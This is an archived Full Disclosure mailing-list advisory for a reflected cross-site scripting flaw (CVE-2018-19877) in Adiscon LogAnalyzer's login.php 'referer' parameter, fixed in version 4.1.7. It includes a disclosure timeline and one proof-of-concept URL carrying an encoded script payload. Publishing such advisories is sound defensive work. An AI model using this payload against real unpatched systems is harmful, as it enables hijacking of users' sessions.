lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 5 Dec 2018 21:40:57 -0300
From: Gustavo Sorondo <gs@...tainfinita.com.ar>
To: Full Disclosure Mailing List <fulldisclosure@...lists.org>
Subject: [FD] Cross-Site Scripting in Adiscon LogAnalyzer (CVE-2018-19877)

Title: Cross-Site Scripting in Adiscon LogAnalyzer (CVE-2018-19877)
Credit: Gustavo Sorondo / http://www.cintainfinita.com
Vendor/Product: Adiscon LogAnalyzer (https://loganalyzer.adiscon.com/
https://github.com/rsyslog/loganalyzer)
Vulnerability: Cross-Site Scripting (XSS)
Vulnerable version: 4.1.6 and earlier
Fixed in: 4.1.7
CVE: CVE-2018-19877

## Vulnerability Details

Adiscon LogAnalyzer  before 4.1.7 is affected by Cross-Site Scripting (XSS)
in the 'referer' parameter of the login.php file.

Proof of Concept:
http://my.loganalyzer.instance/login.php?referer=%22%3E%3Cscript%3Ealert('Cinta%20Infinita')%3C/script%3E

## Vulnerability Disclosure Timeline

2018-11-26 - Vulnerability discovered by Cinta Infinita
2018-11-28 - Vulnerability reported to Adiscon
2018-12-04 - Vulnerability confirmed by Adiscon
2018-12-05 - Issue is fixed and version 4.1.7 is released.
2018-12-05 - CVE-2018-19877 is assigned
2018-12-05 - Full disclosure

## Related fixes and releases

https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
https://github.com/rsyslog/loganalyzer/commit/367b50aa1a5a3eaefacd5fa9be397e6b6480168e#diff-fd4f9de25c2c01b55759936a6cc4b029

## About Cinta Infinita

Cinta Infinita offers Information Security related services. Our
Headquarters are in Buenos Aires, Argentina.
For more information, visit http://cintainfinita.com

--
Ing. Gustavo M. Sorondo
Cinta Infinita - CTO
Web: http://cintainfinita.com
LinkedIn: https://www.linkedin.com/in/gustavosorondo
GPG: http://www.cintainfinita.com/gpg/gs-pkey.txt

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists